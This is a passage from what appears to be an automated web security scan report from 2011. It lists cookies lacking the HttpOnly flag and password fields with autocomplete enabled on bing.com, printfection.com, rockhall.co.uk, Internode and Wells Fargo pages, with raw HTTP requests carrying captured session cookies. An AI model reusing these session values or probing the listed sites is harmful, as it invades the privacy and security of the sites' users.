Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 29 Aug 2010 16:02:38 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4140
Date: Tue, 19 Jul 2011 12:11:10 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:10 GMT; domain=.bing.com; path=/

function _changeHeight(g,e,b,c){var d,a=e,f=function(){if(a<b&&a+c<b||a>b&&a+c>b)a+=c;else{a=b;clearInterval(d)}g.style.height=a+"px"};d=setInterval(f,20)}function _p(a){return a.parentNode}function _
...[SNIP]...

8.31. http://www.bing.com/videos/vthumb_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/vthumb_c.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/vthumb_c.css?v=0819000746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Thu, 19 Aug 2010 00:07:46 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 1540
Date: Tue, 19 Jul 2011 12:11:14 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:14 GMT; domain=.bing.com; path=/

.vt_med,.vt_med img{display:-moz-inline-stack;display:inline-block;position:relative;width:140px}.vt_md{margin-top:5px;font-size:95%}.vt_md a{text-decoration:none}.vt_md .st_c{color:#568e1a;float:left
...[SNIP]...

8.32. http://www.printfection.com/torprojectstore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /torprojectstore HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 01:59:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Content-Length: 29504
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...

8.33. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.printfection.com
Path:   /torprojectstore/T-Shirt/_p_4740139

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /torprojectstore/T-Shirt/_p_4740139 HTTP/1.1
Host: www.printfection.com
Proxy-Connection: keep-alive
Referer: http://www.printfection.com/torprojectstore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; __utma=1.24107.1311040768.1311040768.1311040768.1; __utmb=1.1.10.1311040768; __utmc=1; __utmz=1.1311040768.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://www.printfection.com; httponly
Set-Cookie: pfid=b0ce5ef02f3bd8515edbfb41d2074bd4; path=/; domain=https://printfection.com; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 178354

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

       
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...

8.34. http://www.rockhall.co.uk/10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /10.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 19 Jul 2011 02:00:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Location: hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html
Content-type: text/html
Content-Length: 0


8.35. http://www.rockhall.co.uk/ContactStyles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactStyles HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.36. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/goontwcn-webfont.woff

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/templates/rockhall/fonts/goontwcn-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.37. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/templates/rockhall/fonts/gotwtw__-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.38. http://www.rockhall.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...

8.39. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Date: Tue, 19 Jul 2011 02:00:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Vary: Accept-Encoding
Content-Length: 9530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Obsolete IT equipme
...[SNIP]...

8.40. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 206
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER

pageURL=https%3A//www.wellsfargo.com/&ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&pageID=per_home&tz=-300&r=&App_ID=WWW&RequestType=ContentR
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:02 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:02 GMT;Path=/;Secure
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:02 GMT;Path=/
Content-Length: 1575

/*[{"href":"https://adfarm.mediaplex.com/ad/ck/10918-69547-3408-26","contentId":"WF_CON_HP_PRIMARY_BNR","src":"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/ads/tas/consumer/primary/
...[SNIP]...

9. Password field with autocomplete enabled  previous  next
There are 7 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


9.1. https://secure2.internode.on.net/nodestore/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nodestore/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 19 Jul 2011 10:11:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /nodestore/products/residential
Vary: Accept-Encoding
Content-Length: 6997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, plans, prici
...[SNIP]...
</h3>
   <form id="restore_cart" enctype="application/x-www-form-urlencoded" method="post" accept-charset="UTF-8" action="/nodestore/cart/restore">


<input class="button" type="submit" id="continue" accesskey="n" name="direction" value="go" title="Next"/>
...[SNIP]...
</label> <input type="password" name="password" id="password" value="" helper="formPassword" class="password">        <div id="password_hint" class="hint" style="display: none">
...[SNIP]...

9.2. https://secure2.internode.on.net/nodestore/checkout/customer/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure2.internode.on.net
Path:   /nodestore/checkout/customer/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /nodestore/checkout/customer/ HTTP/1.1
Host: secure2.internode.on.net
Connection: keep-alive
Referer: https://secure2.internode.on.net/nodestore/products/residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1449462245.1311069834.1311069834.1311069834.1; __utmb=1.7.10.1311069834; __utmc=1; __utmz=1.1311069834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nodestore_session=2cdf3c71-baba97f6-2cdf3c70-baba97f6-00000002-qm5papuuccc7vpckhvg6v67vv7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 10:08:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 24416
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html><html>
<head>
   <title>Welcome :: NodeStore :: Internode</title>    <meta name="copyright" content="Internode Pty Ltd" >
<meta name="keywords" content="internode, broadband, adsl, adsl2+, p
...[SNIP]...
</h3>
   <form id="restore_cart" enctype="application/x-www-form-urlencoded" method="post" accept-charset="UTF-8" action="/nodestore/cart/restore">


<input class="button" type="submit" id="continue" accesskey="n" name="direction" value="go" title="Next"/>
...[SNIP]...
</label> <input type="password" name="password" id="password" value="" helper="formPassword" class="password">        <div id="password_hint" class="hint" style="display: none">
...[SNIP]...

9.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
Referer: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; WFsignonCookie=

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:29 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</script>

<form method="post" name="formlogin" id="formlogin" action="">
<input type="hidden" name="REALM" value="CEO Home" />
...[SNIP]...
<br /><input class="signon" type="password" name="PASSWORD" size="8" accesskey="p" id="password" tabindex="3" /></div>
...[SNIP]...

9.4. https://wfefs.wellsfargo.com/boa/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wfefs.wellsfargo.com
Path:   /boa/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /boa/ HTTP/1.1
Host: wfefs.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:58:14 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-Cache
Pragma: No-Cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 5123


<html>
   <head>
       <meta http-equiv="Content-Type"
           content="text/html; charset=iso-8859-1">
       <title>Borrower Online Access</title>
       <link rel="stylesheet" href="common/style.css" t
...[SNIP]...
</div>

           
       <form name="loginForm" method="post" action="/boa/login.do">
